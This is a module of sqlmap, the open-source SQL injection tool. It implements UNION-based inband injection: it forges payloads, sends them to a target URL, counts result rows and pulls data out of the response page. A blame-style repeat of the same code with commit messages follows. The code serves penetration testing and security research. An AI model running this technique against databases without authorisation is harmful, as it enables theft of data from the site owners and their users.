sqlmap/lib/techniques/inband/union/use.py

#!/usr/bin/env python

"""
$Id$

This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.

sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
details.

You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
"""

import re
import time

from lib.core.agent import agent
from lib.core.common import parseUnionPage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.data import temp
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
from lib.techniques.inband.union.test import unionTest
from lib.utils.resume import resume

reqCount = 0

def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullChar="NULL", unpack=True):
    """
    This function tests for an inband SQL injection on the target
    url then call its subsidiary function to effectively perform an
    inband SQL injection on the affected url
    """

    count      = None
    origExpr   = expression
    start      = time.time()
    startLimit = 0
    stopLimit  = None
    test       = True
    value      = ""

    global reqCount

    if resetCounter:
        reqCount = 0

    if not kb.unionCount:
        unionTest()

    if not kb.unionCount:
        return

    # Prepare expression with delimiters
    if unescape:
        expression = agent.concatQuery(expression, unpack)
        expression = unescaper.unescape(expression)

    if ( conf.paramNegative or conf.paramFalseCond ) and not direct:
        _, _, _, _, _, expressionFieldsList, expressionFields = agent.getFields(origExpr)

        if len(expressionFieldsList) > 1:
            infoMsg  = "the SQL query provided has more than a field. "
            infoMsg += "sqlmap will now unpack it into distinct queries "
            infoMsg += "to be able to retrieve the output even if we "
            infoMsg += "are in front of a partial inband sql injection"
            logger.info(infoMsg)

        # We have to check if the SQL query might return multiple entries
        # and in such case forge the SQL limiting the query output one
        # entry per time
        # NOTE: I assume that only queries that get data from a table can
        # return multiple entries
        if " FROM " in expression:
            limitRegExp = re.search(queries[kb.dbms].limitregexp, expression, re.I)

            if limitRegExp:
                if kb.dbms in ( "MySQL", "PostgreSQL" ):
                    limitGroupStart = queries[kb.dbms].limitgroupstart
                    limitGroupStop  = queries[kb.dbms].limitgroupstop

                    if limitGroupStart.isdigit():
                        startLimit = int(limitRegExp.group(int(limitGroupStart)))

                    stopLimit = limitRegExp.group(int(limitGroupStop))
                    limitCond = int(stopLimit) > 1

                elif kb.dbms == "Microsoft SQL Server":
                    limitGroupStart = queries[kb.dbms].limitgroupstart
                    limitGroupStop  = queries[kb.dbms].limitgroupstop

                    if limitGroupStart.isdigit():
                        startLimit = int(limitRegExp.group(int(limitGroupStart)))

                    stopLimit = limitRegExp.group(int(limitGroupStop))
                    limitCond = int(stopLimit) > 1

                elif kb.dbms == "Oracle":
                    limitCond = False
            else:
                limitCond = True

            # I assume that only queries NOT containing a "LIMIT #, 1"
            # (or similar depending on the back-end DBMS) can return
            # multiple entries
            if limitCond:
                if limitRegExp:
                    stopLimit = int(stopLimit)

                    # From now on we need only the expression until the " LIMIT "
                    # (or similar, depending on the back-end DBMS) word
                    if kb.dbms in ( "MySQL", "PostgreSQL" ):
                        stopLimit += startLimit
                        untilLimitChar = expression.index(queries[kb.dbms].limitstring)
                        expression = expression[:untilLimitChar]

                    elif kb.dbms == "Microsoft SQL Server":
                        stopLimit += startLimit

                if not stopLimit or stopLimit <= 1:
                    if kb.dbms == "Oracle" and expression.endswith("FROM DUAL"):
                        test = False
                    else:
                        test = True

                if test:
                    # Count the number of SQL query entries output
                    countFirstField   = queries[kb.dbms].count % expressionFieldsList[0]
                    countedExpression = origExpr.replace(expressionFields, countFirstField, 1)

                    if re.search(" ORDER BY ", expression, re.I):
                        untilOrderChar = countedExpression.index(" ORDER BY ")
                        countedExpression = countedExpression[:untilOrderChar]

                    count = resume(countedExpression, None)

                    if not stopLimit:
                        if not count or not count.isdigit():
                            output = unionUse(countedExpression, direct=True)

                            if output:
                                count = parseUnionPage(output, countedExpression)

                        if count and count.isdigit() and int(count) > 0:
                            stopLimit = int(count)

                            infoMsg  = "the SQL query provided returns "
                            infoMsg += "%d entries" % stopLimit
                            logger.info(infoMsg)

                        elif count and not count.isdigit():
                            warnMsg  = "it was not possible to count the number "
                            warnMsg += "of entries for the SQL query provided. "
                            warnMsg += "sqlmap will assume that it returns only "
                            warnMsg += "one entry"
                            logger.warn(warnMsg)

                            stopLimit = 1

                        elif ( not count or int(count) == 0 ):
                            warnMsg  = "the SQL query provided does not "
                            warnMsg += "return any output"
                            logger.warn(warnMsg)

                            return

                    elif ( not count or int(count) == 0 ) and ( not stopLimit or stopLimit == 0 ):
                        warnMsg  = "the SQL query provided does not "
                        warnMsg += "return any output"
                        logger.warn(warnMsg)

                        return

                    for num in xrange(startLimit, stopLimit):
                        if kb.dbms == "Microsoft SQL Server":
                            orderBy = re.search(" ORDER BY ([\w\_]+)", expression, re.I)

                            if orderBy:
                                field = orderBy.group(1)
                            else:
                                field = expressionFieldsList[0]

                        elif kb.dbms == "Oracle":
                            field = expressionFieldsList

                        else:
                            field = None

                        limitedExpr = agent.limitQuery(num, expression, field)
                        output      = unionUse(limitedExpr, direct=True, unescape=False)

                        if output:
                            value += output

                    return value

        value = unionUse(expression, direct=True, unescape=False)

    else:
        # Forge the inband SQL injection request
        query = agent.forgeInbandQuery(expression, nullChar=nullChar)
        payload = agent.payload(newValue=query)

        # NOTE: for debug purposes only
        #debugMsg = "query: %s" % payload
        debugMsg = "query: %s" % query
        logger.debug(debugMsg)

        # Perform the request
        resultPage, _ = Request.queryPage(payload, content=True)
        reqCount += 1

        if temp.start not in resultPage or temp.stop not in resultPage:
            return

        # Parse the returned page to get the exact inband
        # sql injection output
        startPosition = resultPage.index(temp.start)
        endPosition = resultPage.rindex(temp.stop) + len(temp.stop)
        value = str(resultPage[startPosition:endPosition])

        duration = int(time.time() - start)

        debugMsg = "performed %d queries in %d seconds" % (reqCount, duration)
        logger.debug(debugMsg)

    return value
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`#!/usr/bin/env python`

			`"""`
propsets.. 2008-10-15 19:56:32 +04:00			$Id$
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
			`This file is part of the sqlmap project, http://sqlmap.sourceforge.net.`

Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>`
			`Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
			`sqlmap is free software; you can redistribute it and/or modify it under`
			`the terms of the GNU General Public License as published by the Free`
			`Software Foundation version 2 of the License.`

			`sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY`
			`WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS`
			`FOR A PARTICULAR PURPOSE. See the GNU General Public License for more`
			`details.`

			`You should have received a copy of the GNU General Public License along`
			`with sqlmap; if not, write to the Free Software Foundation, Inc., 51`
			`Franklin St, Fifth Floor, Boston, MA 02110-1301 USA`
			`"""`

Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`import re`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`import time`

			`from lib.core.agent import agent`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`from lib.core.common import parseUnionPage`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`from lib.core.data import queries`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.data import temp`
			`from lib.core.unescaper import unescaper`
			`from lib.request.connect import Connect as Request`
			`from lib.techniques.inband.union.test import unionTest`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`from lib.utils.resume import resume`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`reqCount = 0`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullChar="NULL", unpack=True):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`
			`This function tests for an inband SQL injection on the target`
			`url then call its subsidiary function to effectively perform an`
			`inband SQL injection on the affected url`
			`"""`

Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`count = None`
			`origExpr = expression`
			`start = time.time()`
			`startLimit = 0`
			`stopLimit = None`
			`test = True`
			`value = ""`

			`global reqCount`

sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if resetCounter:`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`reqCount = 0`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
			`if not kb.unionCount:`
			`unionTest()`

			`if not kb.unionCount:`
			`return`

			`# Prepare expression with delimiters`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`if unescape:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`expression = agent.concatQuery(expression, unpack)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`expression = unescaper.unescape(expression)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if ( conf.paramNegative or conf.paramFalseCond ) and not direct:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`_, _, _, _, _, expressionFieldsList, expressionFields = agent.getFields(origExpr)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00
			`if len(expressionFieldsList) > 1:`
			`infoMsg = "the SQL query provided has more than a field. "`
			`infoMsg += "sqlmap will now unpack it into distinct queries "`
			`infoMsg += "to be able to retrieve the output even if we "`
			`infoMsg += "are in front of a partial inband sql injection"`
			`logger.info(infoMsg)`

			`# We have to check if the SQL query might return multiple entries`
			`# and in such case forge the SQL limiting the query output one`
			`# entry per time`
			`# NOTE: I assume that only queries that get data from a table can`
			`# return multiple entries`
			`if " FROM " in expression:`
			`limitRegExp = re.search(queries[kb.dbms].limitregexp, expression, re.I)`

			`if limitRegExp:`
			`if kb.dbms in ( "MySQL", "PostgreSQL" ):`
			`limitGroupStart = queries[kb.dbms].limitgroupstart`
			`limitGroupStop = queries[kb.dbms].limitgroupstop`

			`if limitGroupStart.isdigit():`
			`startLimit = int(limitRegExp.group(int(limitGroupStart)))`

			`stopLimit = limitRegExp.group(int(limitGroupStop))`
			`limitCond = int(stopLimit) > 1`

Major bug fix to make it work properly with MSSQL custom limited (SELECT TOP ...) queries with both inferential blind and Full UNION query injection 2009-01-03 02:26:45 +03:00			`elif kb.dbms == "Microsoft SQL Server":`
			`limitGroupStart = queries[kb.dbms].limitgroupstart`
			`limitGroupStop = queries[kb.dbms].limitgroupstop`

			`if limitGroupStart.isdigit():`
			`startLimit = int(limitRegExp.group(int(limitGroupStart)))`

			`stopLimit = limitRegExp.group(int(limitGroupStop))`
			`limitCond = int(stopLimit) > 1`

			`elif kb.dbms == "Oracle":`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`limitCond = False`
			`else:`
			`limitCond = True`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`# I assume that only queries NOT containing a "LIMIT #, 1"`
			`# (or similar depending on the back-end DBMS) can return`
			`# multiple entries`
			`if limitCond:`
			`if limitRegExp:`
			`stopLimit = int(stopLimit)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`# From now on we need only the expression until the " LIMIT "`
			`# (or similar, depending on the back-end DBMS) word`
			`if kb.dbms in ( "MySQL", "PostgreSQL" ):`
			`stopLimit += startLimit`
			`untilLimitChar = expression.index(queries[kb.dbms].limitstring)`
			`expression = expression[:untilLimitChar]`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Fixed custom MSSQL "limited" query support also for Partial UNION query technique 2009-01-03 03:27:04 +03:00			`elif kb.dbms == "Microsoft SQL Server":`
			`stopLimit += startLimit`

Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`if not stopLimit or stopLimit <= 1:`
			`if kb.dbms == "Oracle" and expression.endswith("FROM DUAL"):`
			`test = False`
			`else:`
			`test = True`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if test:`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`# Count the number of SQL query entries output`
			`countFirstField = queries[kb.dbms].count % expressionFieldsList[0]`
			`countedExpression = origExpr.replace(expressionFields, countFirstField, 1)`

			`if re.search(" ORDER BY ", expression, re.I):`
			`untilOrderChar = countedExpression.index(" ORDER BY ")`
			`countedExpression = countedExpression[:untilOrderChar]`

			`count = resume(countedExpression, None)`

			`if not stopLimit:`
			`if not count or not count.isdigit():`
			`output = unionUse(countedExpression, direct=True)`

			`if output:`
			`count = parseUnionPage(output, countedExpression)`

			`if count and count.isdigit() and int(count) > 0:`
			`stopLimit = int(count)`

			`infoMsg = "the SQL query provided returns "`
			`infoMsg += "%d entries" % stopLimit`
			`logger.info(infoMsg)`

Minor adjustments and bug fixes 2008-12-17 23:11:18 +03:00			`elif count and not count.isdigit():`
			`warnMsg = "it was not possible to count the number "`
			`warnMsg += "of entries for the SQL query provided. "`
			`warnMsg += "sqlmap will assume that it returns only "`
			`warnMsg += "one entry"`
			`logger.warn(warnMsg)`

			`stopLimit = 1`

Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`elif ( not count or int(count) == 0 ):`
			`warnMsg = "the SQL query provided does not "`
			`warnMsg += "return any output"`
			`logger.warn(warnMsg)`

			`return`

			`elif ( not count or int(count) == 0 ) and ( not stopLimit or stopLimit == 0 ):`
			`warnMsg = "the SQL query provided does not "`
			`warnMsg += "return any output"`
			`logger.warn(warnMsg)`

			`return`

			`for num in xrange(startLimit, stopLimit):`
Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server. 2008-12-23 01:48:44 +03:00			`if kb.dbms == "Microsoft SQL Server":`
			`orderBy = re.search(" ORDER BY ([\w\_]+)", expression, re.I)`

			`if orderBy:`
			`field = orderBy.group(1)`
			`else:`
			`field = expressionFieldsList[0]`

			`elif kb.dbms == "Oracle":`
Minor bug fixes to --os-shell (altought web backdoor functionality still to be reviewed). Minor common library code refactoring. Code cleanup. Set back the default User-Agent to sqlmap for comparison algorithm reasons. Updated THANKS. 2009-04-28 03:05:11 +04:00			`field = expressionFieldsList`
Major bug fix to make partial UNION query sql injection work properly also on Microsoft SQL Server 2008-12-22 22:36:01 +03:00
			`else:`
Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server. 2008-12-23 01:48:44 +03:00			`field = None`
Major bug fix to make partial UNION query sql injection work properly also on Microsoft SQL Server 2008-12-22 22:36:01 +03:00
			`limitedExpr = agent.limitQuery(num, expression, field)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`output = unionUse(limitedExpr, direct=True, unescape=False)`

			`if output:`
			`value += output`

			`return value`

			`value = unionUse(expression, direct=True, unescape=False)`

			`else:`
			`# Forge the inband SQL injection request`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`query = agent.forgeInbandQuery(expression, nullChar=nullChar)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`payload = agent.payload(newValue=query)`

Minor bug fix to --os-cmd/--os-shell for Microsoft SQL Server 2009-07-25 15:45:23 +04:00			`# NOTE: for debug purposes only`
			`#debugMsg = "query: %s" % payload`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`debugMsg = "query: %s" % query`
			`logger.debug(debugMsg)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00
			`# Perform the request`
Initial support to automatically work around the dynamic page at each refresh (Major refactor to the comparison algorithm (True/False response)) 2008-12-18 23:48:23 +03:00			`resultPage, _ = Request.queryPage(payload, content=True)`
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`reqCount += 1`

			`if temp.start not in resultPage or temp.stop not in resultPage:`
			`return`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`# Parse the returned page to get the exact inband`
			`# sql injection output`
			`startPosition = resultPage.index(temp.start)`
			`endPosition = resultPage.rindex(temp.stop) + len(temp.stop)`
			`value = str(resultPage[startPosition:endPosition])`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup. 2008-12-10 20:23:07 +03:00			`duration = int(time.time() - start)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`debugMsg = "performed %d queries in %d seconds" % (reqCount, duration)`
			`logger.debug(debugMsg)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
			`return value`